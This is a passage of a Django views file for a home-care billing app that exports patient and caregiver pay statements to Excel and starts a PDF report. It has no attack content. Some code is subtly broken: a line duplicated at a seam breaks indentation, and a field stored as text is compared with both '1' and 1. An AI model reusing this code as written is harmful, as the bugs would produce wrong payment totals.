q in query:\t\t# pauta_aux, day by day\n\t\tif q.rut != rut_x:\n\t\t\t# patient changed: close the previous block with its subtotals\n\t\t\tws.cell(row=r,column=20).value = \"Subtotal:\"\n\t\t\tws.cell(row=r,column=21).value = subtot\n\n\t\t\tr = r+1\n\t\t\tws.cell(row=r,column=20).value = \"Tot.Anticipo:\"\n\t\t\ttotAnticipo = anticipos(rut_x,fecha_ini,fecha_fin)\n\t\t\tws.cell(row=r,column=21).value = totAnticipo\n\n\t\t\tr = r+1\n\t\t\tws.cell(row=r,column=20).value = \"Recauda:\"\n\t\t\tws.cell(row=r,column=21).value = subtot - totAnticipo\n\n\t\t\tsubtot = 0\n\t\t\tva1 = 0\n\t\t\tva2 = 0\n\t\t\tva3 = 0\n\n\t\t\trut_x = q.rut\t# new patient\n\t\t\tr = r+2\n\n\t\tws.cell(row=r,column=2).value = q.rut\n\t\tws.cell(row=r,column=3).value = q.paciente\n\t\tws.cell(row=r,column=4).value = q.fecha\t\t# pauta date\n\n\t\tws.cell(row=r,column=5).value = q.rut_t1\t# caregiver rut\n\t\tws.cell(row=r,column=6).value = q.turno1\t# caregiver name\n\t\tws.cell(row=r,column=7).value = q.tipo_turno1\t# contracted - extra\n\n\t\tws.cell(row=r,column=8).value = q.rut_t2\n\t\tws.cell(row=r,column=9).value = q.turno2\n\t\tws.cell(row=r,column=10).value = q.tipo_turno2\n\n\t\tws.cell(row=r,column=11).value = q.rut_t3\n\t\tws.cell(row=r,column=12).value = q.turno3\n\t\tws.cell(row=r,column=13).value = q.tipo_turno3\n\n\t\tws.cell(row=r,column=14).value = q.valor_t1\t# caregiver values\n\t\tws.cell(row=r,column=15).value = q.valor_t2\n\t\tws.cell(row=r,column=16).value = q.valor_t3\n\n\t\tws.cell(row=r,column=17).value = q.valor_p1\t# patient values\n\t\tws.cell(row=r,column=18).value = q.valor_p2\n\t\tws.cell(row=r,column=19).value = q.valor_p3\n\t\t# with surcharge (1.5x unless reca_cui is '1' = normal)\n\t\tif q.reca_cui != '1':\n\t\t\tif q.valor_p1 is not None:\n\t\t\t\tws.cell(row=r,column=17).value = q.valor_p1 * 1.5\n\t\t\tif q.valor_p2 is not None:\n\t\t\t\tws.cell(row=r,column=18).value = q.valor_p2 * 1.5\n\t\t\tif q.valor_p3 is not None:\n\t\t\t\tws.cell(row=r,column=19).value = q.valor_p3 * 1.5\n\n\t\tif q.valor_p1 is not None:\n\t\t\tva1 = q.valor_p1\n\t\tif q.valor_p2 is not None:\n\t\t\tva2 = q.valor_p2\n\t\tif q.valor_p3 is not None:\n\t\t\tva3 = q.valor_p3\n\t\t# with surcharge\n\t\tif q.reca_cui != '1':\n\t\t\tif q.valor_p1 is not None:\n\t\t\t\tva1 = q.valor_p1 * 1.5\n\t\t\tif q.valor_p2 is not None:\n\t\t\t\tva2 = q.valor_p2 * 1.5\n\t\t\tif q.valor_p3 is not None:\n\t\t\t\tva3 = q.valor_p3 * 1.5\n\n\t\tws.cell(row=r,column=21).value = va1 + va2 + va3\n\t\tsubtot = subtot + va1 + va2 + va3\n\n\t\tif q.valor_t1 is not None:\n\t\t\ttot1 = tot1 + q.valor_t1\n\t\tif q.valor_p1 is not None:\n\t\t\ttot_pac1 = tot_pac1 + q.valor_p1\n\n\t\tif q.valor_t2 is not None:\n\t\t\ttot2 = tot2 + q.valor_t2\n\t\tif q.valor_p2 is not None:\n\t\t\ttot_pac2 = tot_pac2 + q.valor_p2\n\n\t\tif q.valor_t3 is not None:\n\t\t\ttot3 = tot3 + q.valor_t3\n\t\tif q.valor_p3 is not None:\n\t\t\ttot_pac3 = tot_pac3 + q.valor_p3\n\n\t\tws.cell(row=r,column=20).value = q.reca_cui\t# caregiver surcharge\n\n\t\tr = r+1\t# row counter\n\n\t# close the last patient's block\n\tws.cell(row=r,column=20).value = \"Subtotal:\"\n\tws.cell(row=r,column=21).value = subtot\n\tr = r+1\n\tws.cell(row=r,column=20).value = \"Tot.Anticipo:\"\n\ttotAnticipo = anticipos(rut_x,fecha_ini,fecha_fin)\n\tws.cell(row=r,column=21).value = totAnticipo\n\n\tr = r+1\n\tws.cell(row=r,column=20).value = \"Recauda:\"\n\tws.cell(row=r,column=21).value = subtot - totAnticipo\n\tr = r+1\n\n\tws.delete_rows(5, 4)\t# drop the 4 empty subtotal rows emitted before the first patient\n\n\tresponse = HttpResponse(content_type='application/vnd.ms-excel')\n\tresponse['Content-Disposition'] = 'attachment; filename='+string_nombre+'.xlsx'\n\twb.save(response)\n\treturn response\n\n@login_required(login_url='login_ini')\ndef eliminapauvacias(request):\n\t# delete every pauta row with no shift assigned at all (empty rows)\n\tvariable1 = 'Mantención de Parametros'\n\tlogo = \"/static/img/Logo_AsistenciaIntegral.jpg\"\n\terror_new = 'error1'\n\tpautaparaborrar = Pauta.objects.filter(turno1=None,turno2=None,turno3=None)\n\tx = pautaparaborrar.count()\t# how many rows will go\n\tpautaparaborrar.delete()\n\tx = str(x)\n\tcontext = {\n\t\t\"error_new\":error_new,\n\t\t\"variable1\":variable1,\n\t\t\"logo_corp\":logo,\n\t\t\"x\":x,\n\t\t}\n\treturn render(request,'menuparametros.html',context)\n
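\n\n# --- Editor's sketch (hypothetical helper) ---\n# acsv above and cartolacui below both finish by wrapping a Workbook in an\n# HttpResponse with the same headers; a tiny helper would remove the\n# duplication. xlsx_response is an invented name.\ndef xlsx_response(wb, nombre):\n\tresponse = HttpResponse(content_type='application/vnd.ms-excel')\n\tresponse['Content-Disposition'] = 'attachment; filename=' + nombre + '.xlsx'\n\twb.save(response)\t# openpyxl writes the workbook into the response body\n\treturn response\n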
\n\n# EXCEL STATEMENT: CAREGIVER PAY\n@login_required(login_url='login_ini')\ndef cartolacui(request):\n\tnom_arch = nombrearch()\t# builds the excel file name (misfunciones.py)\n\tstring_nombre = 'cui'+nom_arch\n\tquery = Pagocui_aux.objects.all().order_by('rut_t1','fecha')\t# pautas within the date range\n\n\twb = Workbook()\n\tws = wb.create_sheet(\"hoja1\",0)\n\tws.column_dimensions['A'].width = 5\n\tws.column_dimensions['B'].width = 12\t# caregiver rut\n\tws.column_dimensions['C'].width = 36\t# caregiver name\n\tws.column_dimensions['D'].width = 17\t# date\n\tws.column_dimensions['E'].width = 12\t# patient rut\n\tws.column_dimensions['F'].width = 23\t# patient name\n\tws.column_dimensions['G'].width = 12\t# shift type\n\n\tws.column_dimensions['H'].width = 9\t# shift-1 value\n\tws.column_dimensions['I'].width = 9\t# shift-2 value\n\tws.column_dimensions['J'].width = 9\t# shift-3 value\n\n\tws.column_dimensions['K'].width = 11\t# surcharge\n\tws.column_dimensions['L'].width = 9\t# shift totals\n\n\tr = 4\t# position of the first (header) row\n\tws.cell(row=r-3,column=2).value = \"CARTOLA PAGO CUIDADORES\"\n\t_cell = ws.cell(row=1,column=2)\n\t_cell.font = Font(color=\"FF0000\")\n\n\tws.cell(row=r-3,column=7).value = \"1=Contratado\"\n\tws.cell(row=r-2,column=7).value = \"2=Extra\"\n\tws.cell(row=r-3,column=11).value = \"1=Normal\"\n\tws.cell(row=r-2,column=11).value = \"2=Domingo\"\n\tws.cell(row=r-1,column=11).value = \"3=Festivo\"\n\n\tws.cell(row=r,column=2).value = \"Rut Cuidador\"\n\tws.cell(row=r,column=3).value = \"Cuidador\"\n\tws.cell(row=r,column=4).value = \"Fecha pauta\"\n\tws.cell(row=r,column=5).value = \"Rut paciente\"\n\tws.cell(row=r,column=6).value = \"Paciente\"\n\n\tws.cell(row=r,column=7).value = \"Tipo turno\"\n\n\tws.cell(row=r,column=8).value = \"$ turno 1\"\n\tws.cell(row=r,column=9).value = \"$ turno 2\"\n\tws.cell(row=r,column=10).value = \"$ turno 3\"\n\n\tws.cell(row=r,column=11).value = \"recargo\"\n\tws.cell(row=r,column=12).value = \"A Pago\"\n\n\tva1 = 0\t# accumulators for caregiver values\n\tva2 = 0\n\tva3 = 0\n\n\tsubtot = 0\n\trut_x = ''\n\tr = r+1\n\tfor c in query:\t# pagocui_aux\n\t\tif c.rut_t1 != rut_x:\n\t\t\t# caregiver changed: close the previous block\n\t\t\tws.cell(row=r,column=11).value = \"Sub Total:\"\n\t\t\tws.cell(row=r,column=12).value = subtot\n\t\t\tva1 = 0\n\t\t\tva2 = 0\n\t\t\tva3 = 0\n\t\t\tsubtot = 0\n\t\t\trut_x = c.rut_t1\n\t\t\tr = r+2\n\n\t\tws.cell(row=r,column=2).value = c.rut_t1\t# caregiver rut\n\t\tws.cell(row=r,column=3).value = c.turno1\t# caregiver name\n\t\tws.cell(row=r,column=4).value = c.fecha\t\t# pauta date\n\t\tws.cell(row=r,column=5).value = c.rut\n\t\tws.cell(row=r,column=6).value = c.paciente\n\n\t\tws.cell(row=r,column=7).value = c.tipo_turno\t# contracted - extra\n\n\t\t# caregiver surcharge value from the RECC parameter\n\t\tval_reca = 0\t# default when no RECC row matches\n\t\trecc = Param.objects.filter(tipo='RECC',codigo=c.reca_cui)\n\t\tfor erre in recc:\n\t\t\tval_reca = erre.valor1\n\n\t\tif c.turno == '1':\n\t\t\tif c.valor is not None:\n\t\t\t\tva1 = c.valor\n\t\t\t\tws.cell(row=r,column=8).value = c.valor\n\t\t\t\tif c.reca_cui != '1':\t# reca_cui is stored as text\n\t\t\t\t\tws.cell(row=r,column=8).value = val_reca\n\t\t\t\t\tva1 = val_reca\n
val_reca\n\t\t\t\t\tva1 = val_reca\t\n\n\t\tif c.turno == '2':\n\t\t\tif c.valor != None:\n\t\t\t\tva2 = c.valor\n\t\t\t\tws.cell(row=r,column=9).value = c.valor\n\t\t\t\tif c.reca_cui != 1:\n\t\t\t\t\tws.cell(row=r,column=9).value = val_reca\n\t\t\t\t\tva2 = val_reca\n\n\t\tif c.turno == '3':\n\t\t\tif c.valor != None:\n\t\t\t\tva3 = c.valor\n\t\t\t\tws.cell(row=r,column=10).value = c.valor\n\t\t\t\tif c.reca_cui != 1:\n\t\t\t\t\tws.cell(row=r,column=10).value = val_reca\n\t\t\t\t\tva3 = val_reca\n\n\t\tws.cell(row=r,column=11).value = c.reca_cui # recargo cuidador\n\t\tws.cell(row=r,column=12).value = va1 + va2 + va3\n\t\tif c.tipo_turno == '1':\n\t\t\tws.cell(row=r,column=12).value = 0\n\t\t\tva1 = 0\n\t\t\tva2 = 0\n\t\t\tva3 = 0\n\t\tsubtot = subtot + va1 + va2 + va3\n\t\tva1 = 0\n\t\tva2 = 0\n\t\tva3 = 0\n\t\tr=r+1 # contador defilas \n\t\tws.cell(row=r,column=11).value = \"Sub Total:\"\t\n\t\tws.cell(row=r,column=12).value = subtot\n\n\tws.delete_rows(5,2) # elimina la fila 5, y total borra 2\n\n\tresponse = HttpResponse(content_type='application/vnd.ms-excel')\n\tresponse['Content-Disposition'] = 'attachment; filename='+string_nombre+'.xlsx'\n\twb.save(response)\n\treturn response\n\n\n@login_required(login_url='login_ini')\ndef grid_anticipos(request):\n\tvariable1 = 'Despliegue de Anticipos / Pagos de Paciente'\n\tfechahoy = datetime.now() \n\tnormal_abono = {'Normal':\"0\",'Abono':\"1\"}\n\tbanco\t= Param.objects.filter(tipo='BCO').order_by('descrip')\n\tpaciente = Pacientes_aux.objects.all()\n\tfor ss in paciente:\n\t\trut_x = ss.rut\n\t\tnombre_x = ss.nombre\n\t\tfe_ini = ss.fe_ini\n\n\tdescriabon = Param.objects.filter(tipo='ABON')\t# Efec,Cheq,Tarj\n\n\tanticipo = Anticipos.objects.filter(rut=rut_x)\n\t#\n\t# Rescata el monto del abono inicial\n\tvalor_abono = 0\n\tif fe_ini != None:\n\t\tfe_i = str(fe_ini)[0:10] # entrega '9999-99-99'\tfecha de inicio del paciente\n\t\tfe_f = str(fechahoy)[0:10]\t\t # entrega '9999-99-99' \tfecha actual\n\t\texiste = Anticipos.objects.filter(rut=rut_x,sw_abono=\"1\",fecha__range=(fe_i,fe_f)).exists()\n\t\tif existe==True: \n\t\t\treg_anticipo = Anticipos.objects.get(rut=rut_x,sw_abono=\"1\",fecha__range=(fe_i,fe_f))\n\t\t\tvalor_abono = reg_anticipo.valor\n\n\tcuenta = 0\n\ttot_valor = 0 \n\tfor ss in anticipo:\n\t\tcuenta = cuenta + 1\n\t\ttot_valor = tot_valor + ss.valor\n\n\tcontext = {\n\t\t\"anticipo\":anticipo,\n\t\t\"descriabon\":descriabon,\n\t\t\"cuenta\":cuenta,\n\t\t\"rut_x\":rut_x,\n\t\t\"nombre_x\":nombre_x,\n\t\t\"tot_valor\":tot_valor,\n\t\t\"normal_abono\":normal_abono,\n\t\t\"banco\":banco,\n\t\t\"variable1\":variable1,}\n\n\treturn render(request,'grid_anticipos.html',context)\n\n\ndef consultas(request):\t\t# menu de consultas e impresos\n\tvariable1 = 'Consultas e Impresos'\n\tlogo = \"/static/img/Logo_AsistenciaIntegral.jpg\"\n\tcontext ={ \"variable1\":variable1,\"logo_corp\":logo,}\n\treturn render(request,'consultas.html',context)\n\n\n@login_required(login_url='login_ini')\ndef info_mensual(request):\n\tlogo_excel = \"/static/img/EXCEL0D.ICO\"\n\tlogo = \"/static/img/Logo_AsistenciaIntegral.jpg\"\n\tfechahoy = datetime.now() \n\tdia_hoy = fechahoy.day\n\tmes_hoy = fechahoy.month\n\tano_hoy = fechahoy.year\n\n\t# define 3 años para atras \n\tano = [0,0,0,ano_hoy]\n\tano[0] = ano_hoy - 3\n\tano[1] = ano_hoy - 2\n\tano[2] = ano_hoy - 1\n\t#\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\tmes_hoy = meses[mes_hoy - 1]\t# mes en 
palabras\n\tmes_numerico = fechahoy.month # mes en numero\n\t#\n\tif request.method == \"POST\":\n\t\tmes_hoy = request.POST.get('meses') # se devuelve \"Diciembre\"\n\t\tmes_numerico = meses.index(mes_hoy)+1\n\t\tano_hoy = request.POST.get('ano') # devuelve como caracter\n\t\tano_hoy = int(ano_hoy)\t\t\t\t# para el template ciclo FOR\n\n\t# pauta solo del presente mes\n\tfecha_ini = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-01 00:00:00\"\n\t#total dias del mes\n\ttotdias = calendar.monthrange(int(ano_hoy),meses.index(mes_hoy) + 1)[1] \n\n\tfecha_fin = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-\"+str(totdias)+\" 00:00:00\"\n\n\t# Esten en rango de fecha, y que: valor_t1,valor_t2 y valor_t3 no esten vacios\n\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin)).exclude(valor_t1__exact=None,valor_t2__exact=None,valor_t3__exact=None).order_by('paciente') \n\t#\n\tpaciente = Pacientes.objects.filter(estado=False).order_by('nombre') \n\n\t#saldoant = Saldos.objects.filter(fecha__range=(fecha_ini, fecha_fin),rut=rut_x) \n\n\t# activa tabla Mensual_aux para pasarla en el context\n\tmensual_aux = Mensual_aux.objects.all()\n\t# limpia tabla auxiliar para el: RESUMEN DE PRESTACIONES\n\tMensual_aux.objects.all().delete() # borra todo el contenido de la tabla\n\n\tcursor = connection.cursor() # es necesario: from django.db import connection\n\tcuenta = 0 \n\txcobrar = 0\n\tfor pcte in paciente: \n\t\trut_x = pcte.rut\n\t\tpaciente_x = pcte.nombre\n\n\t\tsaldoant_x = 0\n\t\tsaldoant_x = saldoant(rut_x,mes_numerico,ano_hoy) # misfunciones.py \n\t\tif saldoant_x == None:\n\t\t\tsaldoant_x = 0\n\n\t\tcon_x = pcte.f_apod\t\t# fono contacto\n\t\t# funcion entrega un arreglo\n\t\tarreglo_uno = nturnos(rut_x,fecha_ini,fecha_fin) # en misfunciones.py\n\t\tturnos_x = arreglo_uno[0]\n\t\tvalmes_x = arreglo_uno[1]\n\t\t#abonos_x = arreglo_uno[2]\n\n\t\tabonos_x = 0\n\t\tset_abonos = Anticipos.objects.filter(rut=rut_x,fecha__range=(fecha_ini, fecha_fin)).order_by('fecha')\n\t\tif set_abonos != None:\n\t\t\tfor ab in set_abonos:\n\t\t\t\tabonos_x = abonos_x + ab.valor\n\n\t\tsaldo_x = valmes_x + saldoant_x - abonos_x \n\t\txcobrar = xcobrar + saldo_x\n\n\t\tgrabasaldo(paciente_x,rut_x,saldo_x,str(mes_numerico).zfill(2),ano_hoy) # en misfunciones.py\n\t\t\t\t\n\t\tcursor.execute(\n\t\t\"insert into ai_mensual_aux (rut,paciente,con,turnos,val_mes,saldoant,abonos,saldo,mes,ano,celular,correo,n_apod)\"\n\t\t\"values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n\t\t,[rut_x,paciente_x,con_x,turnos_x,valmes_x,saldoant_x,abonos_x,saldo_x,mes_numerico,ano_hoy,pcte.f_apod,pcte.correo_apod,pcte.n_apod])\n\n\t\tcuenta = cuenta + 1\n\n\tvariable1 = 'Resumen de prestaciones mes de: '+mes_hoy+\" \"+str(ano_hoy)\n\n\tcontext ={\n\t\t\t\"variable1\":variable1,\n\t\t\t\"cuenta\":cuenta,\n\t\t\t\"mensual_aux\":mensual_aux,\n\t\t\t\"logo_corp\":logo,\n\t\t\t\"logo_excel\":logo_excel,\n\t\t\t\"logo\":logo,\n\t\t\t\"meses\":meses,\n\t\t\t\"ano\":ano,\n\t\t\t\"mes_hoy\":mes_hoy,\n\t\t\t\"ano_hoy\":ano_hoy,\n\t\t\t\"xcobrar\":xcobrar,}\n\treturn render(request,'grid_mensual.html',context)\n\n\n@login_required(login_url='login_ini')\ndef info_diario(request,rut,mes,ano):\n\t# Viene de href del nombre en \"GRID_MENSUAL.HTML\"\n\trut_x = rut\n\tlogo_excel = \"/static/img/EXCEL0D.ICO\"\n\tlogo_pdf = \"/static/img/logopdf.png\"\n\tlogo_corp = \"/static/img/Logo_AsistenciaIntegral.jpg\"\n\tmes_hoy = int(mes) \n\tano_hoy = int(ano) \n\tmes_numerico = mes_hoy\n\n\t# define 3 años para atras \n\tano = 
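[0,0,0,ano_hoy]\t# NOTE (added): this list feeds the year <select> in the template;\n\t\t\t\t\t# slots 0-2 become the three previous years, slot 3 keeps the current year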
\n\tano[0] = ano_hoy - 3\n\tano[1] = ano_hoy - 2\n\tano[2] = ano_hoy - 1\n\t#\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\tmes_hoy = meses[mes_hoy - 1]\t# month in words\n\n\t# pauta rows of the selected month only\n\tfecha_ini = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-01\"\n\t# total days in the month\n\ttotdias = calendar.monthrange(int(ano_hoy),meses.index(mes_hoy) + 1)[1] \n\tfecha_fin = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-\"+str(totdias)\n\n\tusuario_y = request.session.get('username_x') # variable stored by the plantilla_base view 08042020\n\n\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin),rut=rut_x)\n\n\t# a queryset is never None; check for an empty result instead\n\tif not pauta.exists():\n\t\treturn HttpResponse(\"No hay datos en Pauta\")\n\n\tpaciente = Pacientes.objects.filter(estado=False,rut=rut_x) \n\tfor pcte in paciente:\n\t\tpaciente_x = pcte.nombre\n\n\t# passed to the template context later\n\tdiario_aux = Diario_aux.objects.filter(username=usuario_y)\t# 08042020\n\n\t# clears this user's rows of the diario_aux scratch table for DETALLE DIARIO DE PRESTACIONES\n\tcursor = connection.cursor() \n\tcursor.execute(\"delete from ai_diario_aux where username = %s\",[usuario_y]) \n\n\t# fetches every payment and/or advance of the period in question\n\tanticipo = Anticipos.objects.filter(rut=rut_x,fecha__range=(fecha_ini, fecha_fin)).order_by('fecha')\n\n\t# Prepares DIARIO_AUX (the whole month) for DETALLE DIARIO DE PRESTACIONES:\n\t# creates 31 rows, or as many days as the month has, tagged with this user\n\tpreparadia(rut_x,mes_numerico,ano_hoy,totdias,paciente_x,usuario_y) # in 'misfunciones'\n\n\t# writes the advances/deposits of the selected period into ai_diario_aux\n\tpagos_x = 0\n\tabonos_x = 0\n\n\t# populates deposits - advances in diario_aux\n\tfor an in anticipo:\n\t\tfe_x = an.fecha\n\t\tfe_x = str(fe_x)[0:10]\n\t\tfe_x = fe_x+\" 00:00:00\" # format required so the row is found in diario_aux\n\t\t\n\t\tabonos_x = anticipos(rut_x,fe_x,fe_x) # that day only (even if there are two payments the same day)\n\t\t#\n\t\tboleta_x = 0\n\t\tif an.boleta != None:\n\t\t\tboleta_x = an.boleta\n\n\t\tcursor.execute(\n\t\t\t\"update ai_diario_aux set abonos=%s, boleta=%s where fecha = %s and username= %s\"\n\t\t\t,[abonos_x,boleta_x,fe_x,usuario_y]\n\t\t)\n\t\tpagos_x = pagos_x + an.valor\n\t\t\t\n\t# Populates from pauta into pauta_aux \n\tcuenta = 0 \n\tacum1_x = 0\n\tacum2_x = 0\n\ttot_turnos = 0\n\n\t# updates diario_aux with the PAUTA values day by day\n\tfor paut in pauta: \t# each day of the month for this rut\n\t\tfecha_x = paut.fecha\n\t\tfecha_x = str(fecha_x)[0:10] # yields '9999-99-99' only\n\t\tfecha_x = fecha_x+\" 00:00:00\" # format required so the row is found in diario_aux\n\t\tvalt1 = 0\n\t\tvalt2 = 0\n\t\tvalt3 = 0\n\n\t\tcuenta = cuenta + 1\n\n\t\tsaldo_ant = saldoant(rut_x,mes_numerico,ano_hoy) # misfunciones.py\n\t\tif saldo_ant == None:\n\t\t\tsaldo_ant = 0\t\n\n\t\ttur1_x = paut.turno1\n\t\tif tur1_x != '' and tur1_x != None:\t\n\t\t\ttur1_x = 1\n\t\t\tvalt1 = paut.valor_p1\n\t\t\tif valt1 == None:\n\t\t\t\tvalt1 = 0\n\t\telse:\n\t\t\ttur1_x = 0\t\n\t\t\n\t\ttur2_x = paut.turno2\n\t\tif tur2_x != '' and tur2_x != None:\n\t\t\ttur2_x = 1\n\t\t\tvalt2 = paut.valor_p2\n\t\t\tif valt2 == None:\n\t\t\t\tvalt2 = 0 \n\t\telse:\n\t\t\ttur2_x = 0\t\n\t\t\n
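\t\t# NOTE (added): each turnoN field holds a caregiver name (or ''); it is normalized\n\t\t# here to a 0/1 flag so shifts can be counted, and valor_pN may be NULL in the DB,\n\t\t# so it is defaulted to 0 before being accumulated.\n\t\ttur3_x = paut.turno3\n\t\tif tur3_x != '' and tur3_x != None:\n\t\t\ttur3_x = 1\n\t\t\tvalt3 = 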
paut.valor_p3\n\t\t\tif valt3 == None:\n\t\t\t\tvalt3 = 0\n\t\telse:\n\t\t\ttur3_x = 0\t\n\n\t\ttot_turnos = tot_turnos + tur1_x + tur2_x + tur3_x\t\n\t\tvaltot = valt1 + valt2 + valt3 # + saldo_ant\n\n\t\tacum1_x = acum1_x + valtot\n\t\tnotas_x = paut.notas\n\n\t\t#busca el dia y actualiza\n\t\tcursor.execute(\n\t\t\t\"update ai_diario_aux set paciente = %s,turno1=%s,turno2=%s,turno3=%s,\"\n\t\t\t\"valor_t1=%s,valor_t2=%s,valor_t3=%s,val_tot=%s,acum1=%s\"\n\t\t\t\"where fecha = %s and username = %s\"\n\t\t\t,[paciente_x,tur1_x,tur2_x,tur3_x,valt1,valt2,valt3,\n\t\t\tvaltot,acum1_x,fecha_x,usuario_y])\t# \n\t\t\n\t# Efectua recalculo de saldo final (acum2)\n\tacum2_x = 0\n\tsaldo1_x = 0\n\tsaldo2_x = 0\n\tneto_x = 0\n\tsaldo_ant = saldoant(rut_x,mes_numerico,ano_hoy) # misfunciones\n\n\t#return HttpResponse(str(saldo_ant))\n\n\tk=0 # para que solo grabe en el primer registro el saldo anterior\n\n\t# graba acum1 y acum2 en diario_aux\n\tfor rec in diario_aux:\n\t\tif rec.username == usuario_y: # \n\t\t\tsaldo1_x = saldo1_x + rec.val_tot\n\t\t\trec.acum1 = saldo1_x \n\t\t\t\n\t\t\tneto_x = neto_x + (rec.valor_t1 + rec.valor_t2 + rec.valor_t3)\t\t\n\t\n\t\t\tif k==0: \n\t\t\t\tsaldo2_x = saldo2_x + rec.val_tot - rec.abonos + saldo_ant \n\t\t\telse:\n\t\t\t\tsaldo2_x = saldo2_x + rec.val_tot - rec.abonos\t\n\t\n\t\t\trec.acum2 = saldo2_x\n\t\t\t\n\t\t\trec.save()\n\t\t\tk=k+1 \n\t \n\trequest.session['rut_pac'] = rut_x # crea variable global para pdfdetalle.view \n\trequest.session['neto_x'] = neto_x # crea variable global\n\n\tvariable1 = \"Paciente: \"+rut_x+\" \"+paciente_x+\" \"+mes_hoy+\"-\"+str(ano_hoy)\n\n\tcontext = {\n\t\t\t\"diario_aux\":diario_aux,\n\t\t\t\"variable1\":variable1,\n\t\t\t\"cuenta\":cuenta,\n\t\t\t\"logo_corp\":logo_corp,\n\t\t\t\"logo_excel\":logo_excel,\n\t\t\t\"logo_pdf\":logo_pdf,\n\t\t\t\"tot_turnos\":tot_turnos,\n\t\t\t\"pagos_x\":pagos_x,\n\t\t\t\"acum1_x\":neto_x,\n\t\t\t\"acum2_x\":saldo2_x,\n\t\t\t\"saldo_ant\":saldo_ant,}\n\treturn render(request,'grid_infodiario.html',context)\n\n\n@login_required(login_url='login_ini')\ndef pdfdetalle(request):\n\t#nom_arch = \"detalle\"+nombrearch()+\".pdf\" # nombre del PDF\n\tancho, alto = letter\n\t\n\t#paciente = Pacientes_aux.objects.all()\t \n\t#for ss in paciente:\t\t\t\t\t\t \n\t# rut_aux = ss.rut \t \t\t\t\t \n\t#\trut_apod = ss.rut_apod \t\t\t\t\t \n\n\trut_aux = request.session.get('rut_pac') # rescata variable global \n\tusername = request.session.get('username_x') \t \n\t#\n\tnom_arch = \"pdf_detalle\"+nombrearch()+\".pdf\" # nombre del PDF # \n\tpaciente = Pacientes.objects.get(rut=rut_aux) \t # \n\trut_apod = paciente.rut_apod \t\t\t\t\t # \n\t#\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\t# desarrollo\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\n\t# produccion\n\t#c = canvas.Canvas(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, pagesize=letter)\n\t\n\tc.setPageSize((ancho, alto))\n\t#\n\t# Borra archivos anteriores PDF's de la carpeta PDFS\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\tarch_y = os.listdir(path_x) #lista todos los que esten es esa ruta\n\n\t# Elimina solo los archivos generados por el actual usuario # \n\tfor arch_pdf in arch_y: # \n\t\tif arch_pdf.find(username) >= 0: # si nombre de usuario esta contenido en el nombre del archivo # \n\t\t\tremove(path_x+arch_pdf) # \n\n\t#diarioaux = Diario_aux.objects.all().order_by('ndia') # \n\tdiarioaux = Diario_aux.objects.filter(username=username).order_by('ndia') # 
04-04-2020\n\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\t\n\tfor fe in diarioaux:\n\t\tpaciente_x = fe.paciente\t\n\t\trut_x = fe.rut\n\t\tfecha_x = fe.fecha\n\t\tcdia_x = fe.cdia\n\t\tndia_x = fe.ndia\n\t\tmes_hoy = fecha_x.month\n\t\tm_x = fecha_x.month\n\t\tmes_hoy = meses[mes_hoy - 1] # mes en palabras\n\t\tano_hoy = fecha_x.year\n\t\tacum2 = fe.acum2\n\t\t#cadena.rjust(50, \"=\")\n\n\ttotdias = calendar.monthrange(ano_hoy,m_x)[1] #total de dias del mes\n\tfecha_ini = str(ano_hoy)+\"-\"+str(m_x).zfill(2)+\"-01\"\n\tfecha_fin = str(ano_hoy)+\"-\"+str(m_x).zfill(2)+\"-\"+str(totdias)\n\n\t## COMIENZA PRIMERA PAGINA\t\n\tc.drawImage(logo_corp, 10, 710,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\n\tc.setFont('Helvetica', 9)\n\n\tc.setLineWidth(.5)\n\t#c.setFillColorRGB(131,194,199) \n\n\tfila = 700\n\ttit = \"DETALLE DE PRESTACIONES\"\n\tc.drawString(225,fila+20,tit)\n\n\t# subrrayado\n\tc.line(225, fila+16, 225 + 128, fila+16) \n\n\t#sub-titulo\n\tc.drawString(35,fila-20,\"Paciente: \"+paciente.nombre+\" \"+paciente.rut+\", Período:\"+\n\t\t\" \"+mes_hoy+\" \"+str(ano_hoy))\n\n\t# fecha actual \n\tc.drawString(500,fila+50,\"Emisión: \"+str(fecha_actual())) # fecha_actual() en misfunciones.py\n\n\t# Prestación actual\n\tvaltot_y = request.session['neto_x'] \n\tvaltot_y = str(\"{:,}\".format(valtot_y))\n\tvaltot_y = str(valtot_y).rjust(14,' ')\n\tc.drawString(470,fila+15,\"Prest. Actual:\")\n\tc.drawString(536,fila+15,valtot_y)\n\n\t# Saldo anterior\n\tsaldoant_x = saldoant(rut_x,m_x,ano_hoy) # misfunciones.py\n\tsaldoant_x = str(\"{:,}\".format(saldoant_x))\n\tsaldoant_x = saldoant_x.strip()\n\t#saldoant_x = str(saldoant_x).rjust(14)\t\n\tc.drawString(470,fila+3,\"Saldo Anterior:\")\n\tc.drawString(536,fila+3,saldoant_x.rjust(14,' '))\n\n\t# Total abonos\n\ttot_abonos = anticipos(rut_x,fecha_ini,fecha_fin) # misfunciones.py\n\n\ttot_abonos = str(\"{:,}\".format(tot_abonos))\n\ttot_abonos = str(tot_abonos).rjust(14,' ')\n\tc.drawString(470,fila-8,\"Tot. 
